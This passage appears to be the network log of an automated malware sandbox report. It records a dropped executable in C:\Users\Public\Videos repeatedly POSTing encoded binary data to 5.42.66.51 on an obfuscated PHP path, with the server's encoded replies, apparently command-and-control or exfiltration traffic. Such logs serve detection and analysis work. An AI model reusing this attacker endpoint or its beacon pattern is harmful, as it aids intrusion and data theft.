                                                                                                Data Ascii: \YC\Z^UZTW[TRWWQXSX_[YU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.3:4=;*P)P+%<)!(.#8Y)!8>:*;/;"_$,P,
                                                                                                Oct 11, 2024 20:38:59.620443106 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:59.747216940 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                68192.168.2.5500535.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:00.012772083 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:00.357491970 CEST2128OUTData Raw: 5c 5e 43 5f 5a 59 50 58 54 57 5b 54 52 56 57 53 58 57 58 5b 5b 5a 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \^C_ZYPXTW[TRVWSXWX[[ZUZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.B%:<X>]2U)6,Z%/]5%[;\)Q4-9.!X)$]."_$,P,
                                                                                                Oct 11, 2024 20:39:00.694513083 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:00.823239088 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 10 23 3f 05 1b 28 33 22 0e 2c 04 25 1c 25 54 3e 17 32 06 30 03 36 03 20 5d 2c 2d 20 09 25 3a 27 58 29 12 0b 0e 30 06 20 06 25 3b 2b 5d 0d 10 25 06 27 30 31 01 2a 16 30 12 2c 3e 3a 13 25 3e 36 18 22 2d 23 50 36 2e 3d 19 31 2c 01 09 26 3e 22 0c 2b 24 32 04 38 05 30 06 25 04 2f 55 0f 11 3b 0c 26 3c 3c 13 35 04 23 56 23 11 05 04 23 59 36 10 34 30 2b 1f 31 2a 2c 05 26 02 29 03 2a 55 30 0e 2a 54 3d 5c 27 3a 2e 0d 2b 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989#?(3",%%T>206 ],- %:'X)0 %;+]%'01*0,>:%>6"-#P6.=1,&>"+$280%/U;&<<5#V##Y640+1*,&)*U0*T=\':.+2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                69192.168.2.5500545.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:00.102210045 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2548
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:00.451417923 CEST2548OUTData Raw: 59 5f 43 5f 5f 5e 55 59 54 57 5b 54 52 5e 57 5d 58 55 58 5f 5b 5c 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_C__^UYTW[TR^W]XUX_[\U[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.09*;?60/.Y"%/#(87,.%)'."_$,P,
                                                                                                Oct 11, 2024 20:39:00.779896021 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:00.907224894 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                70192.168.2.5500555.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:01.036581993 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:01.388938904 CEST2552OUTData Raw: 59 5b 43 5a 5f 53 55 55 54 57 5b 54 52 58 57 57 58 55 58 54 5b 5e 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y[CZ_SUUTW[TRXWWXUXT[^UX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-0(]?(%)6^'?9";X;(;>!;..=_=<\9"_$,P,;
                                                                                                Oct 11, 2024 20:39:01.730787039 CEST25INHTTP/1.1 100 Continue


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                71192.168.2.5500565.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:01.801029921 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:02.176610947 CEST2156OUTData Raw: 59 5f 43 51 5a 5f 50 5d 54 57 5b 54 52 59 57 5d 58 5e 58 5f 5b 5f 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_CQZ_P]TW[TRYW]X^X_[_UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D$*0]>]:T*5$_'.#6;[/ (Z((=W ;)V,=9>7/+"_$,P,
                                                                                                Oct 11, 2024 20:39:02.591818094 CEST1236OUTData Raw: 59 5f 43 51 5a 5f 50 5d 54 57 5b 54 52 59 57 5d 58 5e 58 5f 5b 5f 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_CQZ_P]TW[TRYW]X^X_[_UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D$*0]>]:T*5$_'.#6;[/ (Z((=W ;)V,=9>7/+"_$,P,
                                                                                                Oct 11, 2024 20:39:02.734816074 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:02.734844923 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:02.737710953 CEST920OUTData Raw: 35 38 2e 2b 0b 3b 10 13 37 5b 1c 20 24 55 01 19 04 5a 07 3b 24 03 01 5c 3c 3d 21 14 07 2c 2c 5c 39 02 35 01 25 07 34 01 30 3c 00 5d 0f 00 1c 2d 0d 2c 1e 3c 31 56 22 14 32 5f 2a 2e 25 0d 07 1d 3b 34 28 24 0e 2b 3b 07 3a 10 24 2a 26 5c 2f 12 37 05
                                                                                                Data Ascii: 58.+;7[ $UZ;$\<=!,,\95%40<]-,<1V"2_*.%;4($+;:$*&\/7>,,3+.)6'?!5^7[9?;?>0+?[?-'(%<7(>&3X?;(P-";=4=64[V>>?(";0?[_0$R4>"':Q19#<]_82):.8?X5>=:.>-.=U<!?:?G=++=^!!#
                                                                                                Oct 11, 2024 20:39:03.070744991 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 58 23 3f 3f 14 29 20 3d 1c 3b 03 2a 0d 25 1c 22 5d 25 2b 37 14 21 5c 3b 05 2e 3e 06 0f 25 3a 37 11 2a 3f 32 52 25 2f 33 12 24 3b 2b 5d 0d 10 26 19 24 23 25 01 3d 16 2b 0c 39 2d 26 10 24 2d 36 5f 35 07 2c 08 36 3d 21 16 25 2c 30 50 26 03 3d 54 3f 27 22 02 2d 2c 2f 58 32 14 2f 55 0f 11 3b 0d 27 3f 16 11 35 3d 3c 0c 23 2f 2b 07 21 3f 32 13 22 23 01 12 26 14 38 04 25 02 08 13 2a 0d 2b 1e 3d 22 2d 1a 32 04 26 09 3f 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989X#??) =;*%"]%+7!\;.>%:7*?2R%/3$;+]&$#%=+9-&$-6_5,6=!%,0P&=T?'"-,/X2/U;'?5=<#/+!?2"#&8%*+="-2&?""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                72192.168.2.5500575.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:04.106539011 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:04.451307058 CEST2156OUTData Raw: 5c 58 43 51 5a 5a 50 5a 54 57 5b 54 52 59 57 50 58 50 58 55 5b 5f 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \XCQZZPZTW[TRYWPXPXU[_U[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.B3'=;>80653,##);=!;1V9-*>24\9"_$,P,
                                                                                                Oct 11, 2024 20:39:04.780942917 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:04.914619923 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 05 35 11 37 5f 29 1d 21 1d 38 3a 0f 55 25 31 21 06 25 3b 3c 02 35 04 20 12 39 2d 2f 12 32 14 02 02 29 2f 36 10 24 06 2b 5f 24 01 2b 5d 0d 10 26 5e 27 20 2d 00 3e 06 0e 51 2d 07 2e 5e 33 3e 25 03 23 3e 33 18 21 10 25 5b 32 3f 3c 52 32 3d 2a 0c 3f 24 03 5d 38 2c 01 15 25 04 2f 55 0f 11 38 52 32 01 20 11 22 3d 02 0a 20 06 20 1b 20 3c 29 02 20 20 30 04 25 3a 27 10 26 02 26 59 2a 0d 38 0f 2a 0b 29 1a 27 3a 29 56 3f 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:57_)!8:U%1!%;<5 9-/2)/6$+_$+]&^' ->Q-.^3>%#>3!%[2?<R2=*?$]8,%/U8R2 "= <) 0%:'&&Y*8*)':)V?"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                73192.168.2.5500585.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:04.709857941 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2548
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:05.060659885 CEST2548OUTData Raw: 59 5d 46 5f 5f 5e 50 5a 54 57 5b 54 52 5e 57 5c 58 53 58 5e 5b 5e 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y]F__^PZTW[TR^W\XSX^[^UX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C0#=(!*%7'-"(/<[(()#5W-=_?!/.;"_$,P,
                                                                                                Oct 11, 2024 20:39:05.586491108 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:05.586978912 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:39:05.587106943 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                74192.168.2.5500595.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:05.832288980 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:06.185779095 CEST2156OUTData Raw: 59 58 46 58 5f 5e 55 55 54 57 5b 54 52 5c 57 5d 58 56 58 58 5b 5a 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YXFX_^UUTW[TR\W]XVXX[ZUZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-%)*:W>6<$[#5<;#Y)(>7;2,>">14Y:;"_$,P,+


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                75192.168.2.5500605.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:06.520303965 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:06.873120070 CEST2552OUTData Raw: 59 58 43 5c 5f 5e 50 5e 54 57 5b 54 52 58 57 55 58 55 58 5c 5b 5a 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YXC\_^P^TW[TRXWUXUX\[ZU^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.39);)P<%/65#]/0$Y*8)V4P9-">W4X:"_$,P,;
                                                                                                Oct 11, 2024 20:39:07.216325045 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:07.347053051 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:07 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                76192.168.2.5500615.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:07.458498955 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:07.810586929 CEST2156OUTData Raw: 59 5f 46 5a 5f 53 50 58 54 57 5b 54 52 59 57 51 58 55 58 5e 5b 5a 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_FZ_SPXTW[TRYWQXUX^[ZUV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A3*89*67'/X"];0'=(=#(%P99_>9;"_$,P,
                                                                                                Oct 11, 2024 20:39:08.149085045 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:08.283118010 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 00 23 2f 30 07 28 30 32 0c 2f 14 26 0e 26 0b 22 5f 26 06 24 06 21 29 34 10 39 00 3f 12 26 03 23 59 29 02 32 57 27 06 37 13 30 2b 2b 5d 0d 10 26 16 30 55 2e 11 29 16 27 09 2d 58 32 10 33 3e 3d 07 36 00 06 0d 35 3e 3d 19 26 2c 3c 56 27 2e 3d 50 2b 0a 25 5c 2c 2f 24 06 31 2e 2f 55 0f 11 38 54 31 3f 3c 5e 35 13 27 1c 37 3f 05 06 37 11 0c 12 20 30 3c 05 32 14 2f 5a 27 2f 3e 1d 3e 1d 30 0a 28 31 39 59 31 04 3e 0f 3f 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:#/0(02/&&"_&$!)49?&#Y)2W'70++]&0U.)'-X23>=65>=&,<V'.=P+%\,/$1./U8T1?<^5'7?7 0<2/Z'/>>0(19Y1>?2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                77192.168.2.5500625.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:08.303364038 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:39:08.654578924 CEST2552OUTData Raw: 59 58 43 5c 5a 5e 50 58 54 57 5b 54 52 57 57 54 58 5e 58 59 5b 58 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YXC\Z^PXTW[TRWWTX^XY[XU[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A$:(=+!=5'$*"#X/4\)8P +29=%^=#9"_$,P,
                                                                                                Oct 11, 2024 20:39:08.986346006 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:09.115611076 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                78192.168.2.5500635.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:09.151153088 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
